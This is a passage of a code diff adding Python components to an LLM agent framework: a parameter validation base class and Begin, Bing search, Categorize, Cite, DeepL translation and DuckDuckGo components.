setattr(self, _USER_FEEDED_PARAMS, set())
|
||||
else:
|
||||
setattr(self, _USER_FEEDED_PARAMS, set(conf[_USER_FEEDED_PARAMS]))
|
||||
return getattr(self, _USER_FEEDED_PARAMS)
|
||||
|
||||
def get_user_feeded(self):
|
||||
return self._get_or_init_user_feeded_params_set()
|
||||
|
||||
def get_feeded_deprecated_params(self):
|
||||
return self._get_or_init_feeded_deprecated_params_set()
|
||||
|
||||
@property
|
||||
def _deprecated_params_set(self):
|
||||
return {name: True for name in self.get_feeded_deprecated_params()}
|
||||
|
||||
def __str__(self):
|
||||
|
||||
return json.dumps(self.as_dict(), ensure_ascii=False)
|
||||
|
||||
def as_dict(self):
|
||||
def _recursive_convert_obj_to_dict(obj):
|
||||
ret_dict = {}
|
||||
for attr_name in list(obj.__dict__):
|
||||
if attr_name in [_FEEDED_DEPRECATED_PARAMS, _DEPRECATED_PARAMS, _USER_FEEDED_PARAMS, _IS_RAW_CONF]:
|
||||
continue
|
||||
# get attr
|
||||
attr = getattr(obj, attr_name)
|
||||
if isinstance(attr, pd.DataFrame):
|
||||
ret_dict[attr_name] = attr.to_dict()
|
||||
continue
|
||||
if attr and type(attr).__name__ not in dir(builtins):
|
||||
ret_dict[attr_name] = _recursive_convert_obj_to_dict(attr)
|
||||
else:
|
||||
ret_dict[attr_name] = attr
|
||||
|
||||
return ret_dict
|
||||
|
||||
return _recursive_convert_obj_to_dict(self)
|
||||
|
||||
def update(self, conf, allow_redundant=False):
|
||||
update_from_raw_conf = conf.get(_IS_RAW_CONF, True)
|
||||
if update_from_raw_conf:
|
||||
deprecated_params_set = self._get_or_init_deprecated_params_set()
|
||||
feeded_deprecated_params_set = (
|
||||
self._get_or_init_feeded_deprecated_params_set()
|
||||
)
|
||||
user_feeded_params_set = self._get_or_init_user_feeded_params_set()
|
||||
setattr(self, _IS_RAW_CONF, False)
|
||||
else:
|
||||
feeded_deprecated_params_set = (
|
||||
self._get_or_init_feeded_deprecated_params_set(conf)
|
||||
)
|
||||
user_feeded_params_set = self._get_or_init_user_feeded_params_set(conf)
|
||||
|
||||
def _recursive_update_param(param, config, depth, prefix):
|
||||
if depth > settings.PARAM_MAXDEPTH:
|
||||
raise ValueError("Param define nesting too deep!!!, can not parse it")
|
||||
|
||||
inst_variables = param.__dict__
|
||||
redundant_attrs = []
|
||||
for config_key, config_value in config.items():
|
||||
# redundant attr
|
||||
if config_key not in inst_variables:
|
||||
if not update_from_raw_conf and config_key.startswith("_"):
|
||||
setattr(param, config_key, config_value)
|
||||
else:
|
||||
setattr(param, config_key, config_value)
|
||||
# redundant_attrs.append(config_key)
|
||||
continue
|
||||
|
||||
full_config_key = f"{prefix}{config_key}"
|
||||
|
||||
if update_from_raw_conf:
|
||||
# add user feeded params
|
||||
user_feeded_params_set.add(full_config_key)
|
||||
|
||||
# update user feeded deprecated param set
|
||||
if full_config_key in deprecated_params_set:
|
||||
feeded_deprecated_params_set.add(full_config_key)
|
||||
|
||||
# supported attr
|
||||
attr = getattr(param, config_key)
|
||||
if type(attr).__name__ in dir(builtins) or attr is None:
|
||||
setattr(param, config_key, config_value)
|
||||
|
||||
else:
|
||||
# recursive set obj attr
|
||||
sub_params = _recursive_update_param(
|
||||
attr, config_value, depth + 1, prefix=f"{prefix}{config_key}."
|
||||
)
|
||||
setattr(param, config_key, sub_params)
|
||||
|
||||
if not allow_redundant and redundant_attrs:
|
||||
raise ValueError(
|
||||
f"cpn `{getattr(self, '_name', type(self))}` has redundant parameters: `{[redundant_attrs]}`"
|
||||
)
|
||||
|
||||
return param
|
||||
|
||||
return _recursive_update_param(param=self, config=conf, depth=0, prefix="")
|
||||
|
||||
def extract_not_builtin(self):
|
||||
def _get_not_builtin_types(obj):
|
||||
ret_dict = {}
|
||||
for variable in obj.__dict__:
|
||||
attr = getattr(obj, variable)
|
||||
if attr and type(attr).__name__ not in dir(builtins):
|
||||
ret_dict[variable] = _get_not_builtin_types(attr)
|
||||
|
||||
return ret_dict
|
||||
|
||||
return _get_not_builtin_types(self)
|
||||
|
||||
def validate(self):
|
||||
self.builtin_types = dir(builtins)
|
||||
self.func = {
|
||||
"ge": self._greater_equal_than,
|
||||
"le": self._less_equal_than,
|
||||
"in": self._in,
|
||||
"not_in": self._not_in,
|
||||
"range": self._range,
|
||||
}
|
||||
home_dir = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
|
||||
param_validation_path_prefix = home_dir + "/param_validation/"
|
||||
|
||||
param_name = type(self).__name__
|
||||
param_validation_path = "/".join(
|
||||
[param_validation_path_prefix, param_name + ".json"]
|
||||
)
|
||||
|
||||
validation_json = None
|
||||
|
||||
try:
|
||||
with open(param_validation_path, "r") as fin:
|
||||
validation_json = json.loads(fin.read())
|
||||
except BaseException:
|
||||
return
|
||||
|
||||
self._validate_param(self, validation_json)
|
||||
|
||||
def _validate_param(self, param_obj, validation_json):
|
||||
default_section = type(param_obj).__name__
|
||||
var_list = param_obj.__dict__
|
||||
|
||||
for variable in var_list:
|
||||
attr = getattr(param_obj, variable)
|
||||
|
||||
if type(attr).__name__ in self.builtin_types or attr is None:
|
||||
if variable not in validation_json:
|
||||
continue
|
||||
|
||||
validation_dict = validation_json[default_section][variable]
|
||||
value = getattr(param_obj, variable)
|
||||
value_legal = False
|
||||
|
||||
for op_type in validation_dict:
|
||||
if self.func[op_type](value, validation_dict[op_type]):
|
||||
value_legal = True
|
||||
break
|
||||
|
||||
if not value_legal:
|
||||
raise ValueError(
|
||||
"Plase check runtime conf, {} = {} does not match user-parameter restriction".format(
|
||||
variable, value
|
||||
)
|
||||
)
|
||||
|
||||
elif variable in validation_json:
|
||||
self._validate_param(attr, validation_json)
|
||||
|
||||
@staticmethod
|
||||
def check_string(param, descr):
|
||||
if type(param).__name__ not in ["str"]:
|
||||
raise ValueError(
|
||||
descr + " {} not supported, should be string type".format(param)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_empty(param, descr):
|
||||
if not param:
|
||||
raise ValueError(
|
||||
descr + " does not support empty value."
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_positive_integer(param, descr):
|
||||
if type(param).__name__ not in ["int", "long"] or param <= 0:
|
||||
raise ValueError(
|
||||
descr + " {} not supported, should be positive integer".format(param)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_positive_number(param, descr):
|
||||
if type(param).__name__ not in ["float", "int", "long"] or param <= 0:
|
||||
raise ValueError(
|
||||
descr + " {} not supported, should be positive numeric".format(param)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_nonnegative_number(param, descr):
|
||||
if type(param).__name__ not in ["float", "int", "long"] or param < 0:
|
||||
raise ValueError(
|
||||
descr
|
||||
+ " {} not supported, should be non-negative numeric".format(param)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_decimal_float(param, descr):
|
||||
if type(param).__name__ not in ["float", "int"] or param < 0 or param > 1:
|
||||
raise ValueError(
|
||||
descr
|
||||
+ " {} not supported, should be a float number in range [0, 1]".format(
|
||||
param
|
||||
)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_boolean(param, descr):
|
||||
if type(param).__name__ != "bool":
|
||||
raise ValueError(
|
||||
descr + " {} not supported, should be bool type".format(param)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_open_unit_interval(param, descr):
|
||||
if type(param).__name__ not in ["float"] or param <= 0 or param >= 1:
|
||||
raise ValueError(
|
||||
descr + " should be a numeric number between 0 and 1 exclusively"
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_valid_value(param, descr, valid_values):
|
||||
if param not in valid_values:
|
||||
raise ValueError(
|
||||
descr
|
||||
+ " {} is not supported, it should be in {}".format(param, valid_values)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_defined_type(param, descr, types):
|
||||
if type(param).__name__ not in types:
|
||||
raise ValueError(
|
||||
descr + " {} not supported, should be one of {}".format(param, types)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def check_and_change_lower(param, valid_list, descr=""):
|
||||
if type(param).__name__ != "str":
|
||||
raise ValueError(
|
||||
descr
|
||||
+ " {} not supported, should be one of {}".format(param, valid_list)
|
||||
)
|
||||
|
||||
lower_param = param.lower()
|
||||
if lower_param in valid_list:
|
||||
return lower_param
|
||||
else:
|
||||
raise ValueError(
|
||||
descr
|
||||
+ " {} not supported, should be one of {}".format(param, valid_list)
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _greater_equal_than(value, limit):
|
||||
return value >= limit - settings.FLOAT_ZERO
|
||||
|
||||
@staticmethod
|
||||
def _less_equal_than(value, limit):
|
||||
return value <= limit + settings.FLOAT_ZERO
|
||||
|
||||
@staticmethod
|
||||
def _range(value, ranges):
|
||||
in_range = False
|
||||
for left_limit, right_limit in ranges:
|
||||
if (
|
||||
left_limit - settings.FLOAT_ZERO
|
||||
<= value
|
||||
<= right_limit + settings.FLOAT_ZERO
|
||||
):
|
||||
in_range = True
|
||||
break
|
||||
|
||||
return in_range
|
||||
|
||||
@staticmethod
|
||||
def _in(value, right_value_list):
|
||||
return value in right_value_list
|
||||
|
||||
@staticmethod
|
||||
def _not_in(value, wrong_value_list):
|
||||
return value not in wrong_value_list
|
||||
|
||||
def _warn_deprecated_param(self, param_name, descr):
|
||||
if self._deprecated_params_set.get(param_name):
|
||||
flow_logger.warning(
|
||||
f"{descr} {param_name} is deprecated and ignored in this version."
|
||||
)
|
||||
|
||||
def _warn_to_deprecate_param(self, param_name, descr, new_param):
|
||||
if self._deprecated_params_set.get(param_name):
|
||||
flow_logger.warning(
|
||||
f"{descr} {param_name} will be deprecated in future release; "
|
||||
f"please use {new_param} instead."
|
||||
)
|
||||
return True
|
||||
return False
|
||||
|
||||
|
||||
class ComponentBase(ABC):
|
||||
component_name: str
|
||||
|
||||
def __str__(self):
|
||||
"""
|
||||
{
|
||||
"component_name": "Begin",
|
||||
"params": {}
|
||||
}
|
||||
"""
|
||||
return """{{
|
||||
"component_name": "{}",
|
||||
"params": {}
|
||||
}}""".format(self.component_name,
|
||||
self._param
|
||||
)
|
||||
|
||||
def __init__(self, canvas, id, param: ComponentParamBase):
|
||||
self._canvas = canvas
|
||||
self._id = id
|
||||
self._param = param
|
||||
self._param.check()
|
||||
|
||||
def run(self, history, **kwargs):
|
||||
flow_logger.info("{}, history: {}, kwargs: {}".format(self, json.dumps(history, ensure_ascii=False),
|
||||
json.dumps(kwargs, ensure_ascii=False)))
|
||||
try:
|
||||
res = self._run(history, **kwargs)
|
||||
self.set_output(res)
|
||||
except Exception as e:
|
||||
self.set_output(pd.DataFrame([{"content": str(e)}]))
|
||||
raise e
|
||||
|
||||
return res
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
raise NotImplementedError()
|
||||
|
||||
def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame, partial]]:
|
||||
o = getattr(self._param, self._param.output_var_name)
|
||||
if not isinstance(o, partial) and not isinstance(o, pd.DataFrame):
|
||||
if not isinstance(o, list): o = [o]
|
||||
o = pd.DataFrame(o)
|
||||
|
||||
if allow_partial or not isinstance(o, partial):
|
||||
if not isinstance(o, partial) and not isinstance(o, pd.DataFrame):
|
||||
return pd.DataFrame(o if isinstance(o, list) else [o])
|
||||
return self._param.output_var_name, o
|
||||
|
||||
outs = None
|
||||
for oo in o():
|
||||
if not isinstance(oo, pd.DataFrame):
|
||||
outs = pd.DataFrame(oo if isinstance(oo, list) else [oo])
|
||||
else: outs = oo
|
||||
return self._param.output_var_name, outs
|
||||
|
||||
def reset(self):
|
||||
setattr(self._param, self._param.output_var_name, None)
|
||||
|
||||
def set_output(self, v: pd.DataFrame):
|
||||
setattr(self._param, self._param.output_var_name, v)
|
||||
|
||||
def get_input(self):
|
||||
upstream_outs = []
|
||||
reversed_cpnts = []
|
||||
if len(self._canvas.path) > 1:
|
||||
reversed_cpnts.extend(self._canvas.path[-2])
|
||||
reversed_cpnts.extend(self._canvas.path[-1])
|
||||
|
||||
if DEBUG: print(self.component_name, reversed_cpnts[::-1])
|
||||
for u in reversed_cpnts[::-1]:
|
||||
if self.get_component_name(u) in ["switch"]: continue
|
||||
if self.component_name.lower() == "generate" and self.get_component_name(u) == "retrieval":
|
||||
o = self._canvas.get_component(u)["obj"].output(allow_partial=False)[1]
|
||||
if o is not None:
|
||||
upstream_outs.append(o)
|
||||
continue
|
||||
if u not in self._canvas.get_component(self._id)["upstream"]: continue
|
||||
if self.component_name.lower().find("switch") < 0 \
|
||||
and self.get_component_name(u) in ["relevant", "categorize"]:
|
||||
continue
|
||||
if u.lower().find("answer") >= 0:
|
||||
for r, c in self._canvas.history[::-1]:
|
||||
if r == "user":
|
||||
upstream_outs.append(pd.DataFrame([{"content": c}]))
|
||||
break
|
||||
break
|
||||
if self.component_name.lower().find("answer") >= 0 and self.get_component_name(u) in ["relevant"]:
|
||||
continue
|
||||
o = self._canvas.get_component(u)["obj"].output(allow_partial=False)[1]
|
||||
if o is not None:
|
||||
upstream_outs.append(o)
|
||||
break
|
||||
|
||||
if upstream_outs:
|
||||
df = pd.concat(upstream_outs, ignore_index=True)
|
||||
if "content" in df:
|
||||
df = df.drop_duplicates(subset=['content']).reset_index(drop=True)
|
||||
return df
|
||||
return pd.DataFrame()
|
||||
|
||||
def get_stream_input(self):
|
||||
reversed_cpnts = []
|
||||
if len(self._canvas.path) > 1:
|
||||
reversed_cpnts.extend(self._canvas.path[-2])
|
||||
reversed_cpnts.extend(self._canvas.path[-1])
|
||||
|
||||
for u in reversed_cpnts[::-1]:
|
||||
if self.get_component_name(u) in ["switch", "answer"]: continue
|
||||
return self._canvas.get_component(u)["obj"].output()[1]
|
||||
|
||||
@staticmethod
|
||||
def be_output(v):
|
||||
return pd.DataFrame([{"content": v}])
|
||||
|
||||
def get_component_name(self, cpn_id):
|
||||
return self._canvas.get_component(cpn_id)["obj"].component_name.lower()
|
||||
48
agent/component/begin.py
Normal file
48
agent/component/begin.py
Normal file
@ -0,0 +1,48 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from functools import partial
|
||||
import pandas as pd
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class BeginParam(ComponentParamBase):
|
||||
|
||||
"""
|
||||
Define the Begin component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.prologue = "Hi! I'm your smart assistant. What can I do for you?"
|
||||
|
||||
def check(self):
|
||||
return True
|
||||
|
||||
|
||||
class Begin(ComponentBase):
|
||||
component_name = "Begin"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
if kwargs.get("stream"):
|
||||
return partial(self.stream_output)
|
||||
return pd.DataFrame([{"content": self._param.prologue}])
|
||||
|
||||
def stream_output(self):
|
||||
res = {"content": self._param.prologue}
|
||||
yield res
|
||||
self.set_output(res)
|
||||
|
||||
|
||||
|
||||
85
agent/component/bing.py
Normal file
85
agent/component/bing.py
Normal file
@ -0,0 +1,85 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
import requests
|
||||
import pandas as pd
|
||||
from agent.settings import DEBUG
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class BingParam(ComponentParamBase):
|
||||
"""
|
||||
Define the Bing component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 10
|
||||
self.channel = "Webpages"
|
||||
self.api_key = "YOUR_ACCESS_KEY"
|
||||
self.country = "CN"
|
||||
self.language = "en"
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
self.check_valid_value(self.channel, "Bing Web Search or Bing News", ["Webpages", "News"])
|
||||
self.check_empty(self.api_key, "Bing subscription key")
|
||||
self.check_valid_value(self.country, "Bing Country",
|
||||
['AR', 'AU', 'AT', 'BE', 'BR', 'CA', 'CL', 'DK', 'FI', 'FR', 'DE', 'HK', 'IN', 'ID',
|
||||
'IT', 'JP', 'KR', 'MY', 'MX', 'NL', 'NZ', 'NO', 'CN', 'PL', 'PT', 'PH', 'RU', 'SA',
|
||||
'ZA', 'ES', 'SE', 'CH', 'TW', 'TR', 'GB', 'US'])
|
||||
self.check_valid_value(self.language, "Bing Languages",
|
||||
['ar', 'eu', 'bn', 'bg', 'ca', 'ns', 'nt', 'hr', 'cs', 'da', 'nl', 'en', 'gb', 'et',
|
||||
'fi', 'fr', 'gl', 'de', 'gu', 'he', 'hi', 'hu', 'is', 'it', 'jp', 'kn', 'ko', 'lv',
|
||||
'lt', 'ms', 'ml', 'mr', 'nb', 'pl', 'br', 'pt', 'pa', 'ro', 'ru', 'sr', 'sk', 'sl',
|
||||
'es', 'sv', 'ta', 'te', 'th', 'tr', 'uk', 'vi'])
|
||||
|
||||
|
||||
class Bing(ComponentBase, ABC):
|
||||
component_name = "Bing"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return Bing.be_output("")
|
||||
|
||||
try:
|
||||
headers = {"Ocp-Apim-Subscription-Key": self._param.api_key, 'Accept-Language': self._param.language}
|
||||
params = {"q": ans, "textDecorations": True, "textFormat": "HTML", "cc": self._param.country,
|
||||
"answerCount": 1, "promote": self._param.channel}
|
||||
if self._param.channel == "Webpages":
|
||||
response = requests.get("https://api.bing.microsoft.com/v7.0/search", headers=headers, params=params)
|
||||
response.raise_for_status()
|
||||
search_results = response.json()
|
||||
bing_res = [{"content": '<a href="' + i["url"] + '">' + i["name"] + '</a> ' + i["snippet"]} for i in
|
||||
search_results["webPages"]["value"]]
|
||||
elif self._param.channel == "News":
|
||||
response = requests.get("https://api.bing.microsoft.com/v7.0/news/search", headers=headers,
|
||||
params=params)
|
||||
response.raise_for_status()
|
||||
search_results = response.json()
|
||||
bing_res = [{"content": '<a href="' + i["url"] + '">' + i["name"] + '</a> ' + i["description"]} for i
|
||||
in search_results['news']['value']]
|
||||
except Exception as e:
|
||||
return Bing.be_output("**ERROR**: " + str(e))
|
||||
|
||||
if not bing_res:
|
||||
return Bing.be_output("")
|
||||
|
||||
df = pd.DataFrame(bing_res)
|
||||
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
|
||||
return df
|
||||
87
agent/component/categorize.py
Normal file
87
agent/component/categorize.py
Normal file
@ -0,0 +1,87 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
from api.db import LLMType
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from agent.component import GenerateParam, Generate
|
||||
from agent.settings import DEBUG
|
||||
|
||||
|
||||
class CategorizeParam(GenerateParam):
|
||||
|
||||
"""
|
||||
Define the Categorize component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.category_description = {}
|
||||
self.prompt = ""
|
||||
|
||||
def check(self):
|
||||
super().check()
|
||||
self.check_empty(self.category_description, "[Categorize] Category examples")
|
||||
for k, v in self.category_description.items():
|
||||
if not k: raise ValueError(f"[Categorize] Category name can not be empty!")
|
||||
if not v.get("to"): raise ValueError(f"[Categorize] 'To' of category {k} can not be empty!")
|
||||
|
||||
def get_prompt(self):
|
||||
cate_lines = []
|
||||
for c, desc in self.category_description.items():
|
||||
for l in desc.get("examples", "").split("\n"):
|
||||
if not l: continue
|
||||
cate_lines.append("Question: {}\tCategory: {}".format(l, c))
|
||||
descriptions = []
|
||||
for c, desc in self.category_description.items():
|
||||
if desc.get("description"):
|
||||
descriptions.append(
|
||||
"--------------------\nCategory: {}\nDescription: {}\n".format(c, desc["description"]))
|
||||
|
||||
self.prompt = """
|
||||
You're a text classifier. You need to categorize the user’s questions into {} categories,
|
||||
namely: {}
|
||||
Here's description of each category:
|
||||
{}
|
||||
|
||||
You could learn from the following examples:
|
||||
{}
|
||||
You could learn from the above examples.
|
||||
Just mention the category names, no need for any additional words.
|
||||
""".format(
|
||||
len(self.category_description.keys()),
|
||||
"/".join(list(self.category_description.keys())),
|
||||
"\n".join(descriptions),
|
||||
"- ".join(cate_lines)
|
||||
)
|
||||
return self.prompt
|
||||
|
||||
|
||||
class Categorize(Generate, ABC):
|
||||
component_name = "Categorize"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
input = self.get_input()
|
||||
input = "Question: " + ("; ".join(input["content"]) if "content" in input else "") + "Category: "
|
||||
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
|
||||
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": input}],
|
||||
self._param.gen_conf())
|
||||
if DEBUG: print(ans, ":::::::::::::::::::::::::::::::::", input)
|
||||
for c in self._param.category_description.keys():
|
||||
if ans.lower().find(c.lower()) >= 0:
|
||||
return Categorize.be_output(self._param.category_description[c]["to"])
|
||||
|
||||
return Categorize.be_output(list(self._param.category_description.items())[-1][1]["to"])
|
||||
|
||||
|
||||
75
agent/component/cite.py
Normal file
75
agent/component/cite.py
Normal file
@ -0,0 +1,75 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
|
||||
import pandas as pd
|
||||
|
||||
from api.db import LLMType
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from api.settings import retrievaler
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class CiteParam(ComponentParamBase):
|
||||
|
||||
"""
|
||||
Define the Retrieval component parameters.
|
||||
"""
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.cite_sources = []
|
||||
|
||||
def check(self):
|
||||
self.check_empty(self.cite_source, "Please specify where you want to cite from.")
|
||||
|
||||
|
||||
class Cite(ComponentBase, ABC):
|
||||
component_name = "Cite"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
input = "\n- ".join(self.get_input()["content"])
|
||||
sources = [self._canvas.get_component(cpn_id).output()[1] for cpn_id in self._param.cite_source]
|
||||
query = []
|
||||
for role, cnt in history[::-1][:self._param.message_history_window_size]:
|
||||
if role != "user":continue
|
||||
query.append(cnt)
|
||||
query = "\n".join(query)
|
||||
|
||||
kbs = KnowledgebaseService.get_by_ids(self._param.kb_ids)
|
||||
if not kbs:
|
||||
raise ValueError("Can't find knowledgebases by {}".format(self._param.kb_ids))
|
||||
embd_nms = list(set([kb.embd_id for kb in kbs]))
|
||||
assert len(embd_nms) == 1, "Knowledge bases use different embedding models."
|
||||
|
||||
embd_mdl = LLMBundle(kbs[0].tenant_id, LLMType.EMBEDDING, embd_nms[0])
|
||||
|
||||
rerank_mdl = None
|
||||
if self._param.rerank_id:
|
||||
rerank_mdl = LLMBundle(kbs[0].tenant_id, LLMType.RERANK, self._param.rerank_id)
|
||||
|
||||
kbinfos = retrievaler.retrieval(query, embd_mdl, kbs[0].tenant_id, self._param.kb_ids,
|
||||
1, self._param.top_n,
|
||||
self._param.similarity_threshold, 1 - self._param.keywords_similarity_weight,
|
||||
aggs=False, rerank_mdl=rerank_mdl)
|
||||
|
||||
if not kbinfos["chunks"]: return pd.DataFrame()
|
||||
df = pd.DataFrame(kbinfos["chunks"])
|
||||
df["content"] = df["content_with_weight"]
|
||||
del df["content_with_weight"]
|
||||
return df
|
||||
|
||||
|
||||
62
agent/component/deepl.py
Normal file
62
agent/component/deepl.py
Normal file
@ -0,0 +1,62 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
import re
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
import deepl
|
||||
|
||||
|
||||
class DeepLParam(ComponentParamBase):
|
||||
"""
|
||||
Define the DeepL component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.auth_key = "xxx"
|
||||
self.parameters = []
|
||||
self.source_lang = 'ZH'
|
||||
self.target_lang = 'EN-GB'
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
self.check_valid_value(self.source_lang, "Source language",
|
||||
['AR', 'BG', 'CS', 'DA', 'DE', 'EL', 'EN', 'ES', 'ET', 'FI', 'FR', 'HU', 'ID', 'IT',
|
||||
'JA', 'KO', 'LT', 'LV', 'NB', 'NL', 'PL', 'PT', 'RO', 'RU', 'SK', 'SL', 'SV', 'TR',
|
||||
'UK', 'ZH'])
|
||||
self.check_valid_value(self.target_lang, "Target language",
|
||||
['AR', 'BG', 'CS', 'DA', 'DE', 'EL', 'EN-GB', 'EN-US', 'ES', 'ET', 'FI', 'FR', 'HU',
|
||||
'ID', 'IT', 'JA', 'KO', 'LT', 'LV', 'NB', 'NL', 'PL', 'PT-BR', 'PT-PT', 'RO', 'RU',
|
||||
'SK', 'SL', 'SV', 'TR', 'UK', 'ZH'])
|
||||
|
||||
|
||||
class DeepL(ComponentBase, ABC):
|
||||
component_name = "GitHub"
|
||||
|
||||
def _run(self, history, **kwargs):
|
||||
ans = self.get_input()
|
||||
ans = " - ".join(ans["content"]) if "content" in ans else ""
|
||||
if not ans:
|
||||
return DeepL.be_output("")
|
||||
|
||||
try:
|
||||
translator = deepl.Translator(self._param.auth_key)
|
||||
result = translator.translate_text(ans, source_lang=self._param.source_lang,
|
||||
target_lang=self._param.target_lang)
|
||||
|
||||
return DeepL.be_output(result.text)
|
||||
except Exception as e:
|
||||
DeepL.be_output("**Error**:" + str(e))
|
||||
66
agent/component/duckduckgo.py
Normal file
66
agent/component/duckduckgo.py
Normal file
@ -0,0 +1,66 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from abc import ABC
|
||||
from duckduckgo_search import DDGS
|
||||
import pandas as pd
|
||||
from agent.settings import DEBUG
|
||||
from agent.component.base import ComponentBase, ComponentParamBase
|
||||
|
||||
|
||||
class DuckDuckGoParam(ComponentParamBase):
|
||||
"""
|
||||
Define the DuckDuckGo component parameters.
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.top_n = 10
|
||||
self.channel = "text"
|
||||
|
||||
def check(self):
|
||||
self.check_positive_integer(self.top_n, "Top N")
|
||||
self.check_valid_value(self.channel, "Web Search or News", ["text", "news"])
|
||||
|
||||
|
||||
class DuckDuckGo(ComponentBase, ABC):
|
||||
component_name = "DuckDuckGo"
|
||||
|
||||
